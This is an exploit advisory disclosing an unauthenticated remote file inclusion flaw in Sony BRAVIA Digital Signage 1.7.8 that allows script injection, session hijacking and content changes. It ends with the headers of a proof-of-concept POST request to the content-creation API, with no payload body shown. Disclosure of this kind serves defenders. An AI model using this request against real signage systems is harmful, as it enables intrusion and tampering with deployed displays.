# Exploit Title: Sony BRAVIA Digital Signage 1.7.8 - Unauthenticated Remote File Inclusion
# Date: 20.09.2020
# Exploit Author: LiquidWorm
# Vendor Homepage:
# Version: 1.7.8

Sony BRAVIA Digital Signage 1.7.8 Unauthenticated Remote File Inclusion

Vendor: Sony Electronics Inc.
Product web page:
Affected version: <=1.7.8

Summary: Sony's BRAVIA Signage is an application to deliver
video and still images to Pro BRAVIAs and manage the information
via a network. Features include management of displays, power
schedule management, content playlists, scheduled delivery
management, content interrupt, and more. This cost-effective
digital signage management solution is ideal for presenting
attractive, informative visual content in retail spaces and
hotel reception areas, visitor attractions, educational and
corporate environments.

Desc: BRAVIA digital signage is vulnerable to a remote file
inclusion (RFI) vulnerability by including arbitrary client-side
dynamic scripts (JavaScript, VBScript, HTML) when adding content
though the input URL material of type html. This allows hijacking
the current session of the user, execute cross-site scripting code
or changing the look of the page and content modification on current

Tested on: Microsoft Windows Server 2012 R2

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

Advisory ID: ZSL-2020-5612
Advisory URL:




POST /api/content-creation?type=create&id=174ace2f9371b4 HTTP/1.1
Proxy-Connection: keep-alive
Content-Length: 468
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36
Content-Type: application/json;charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: io=RslVZVH6Dc8WsOn5AAAJ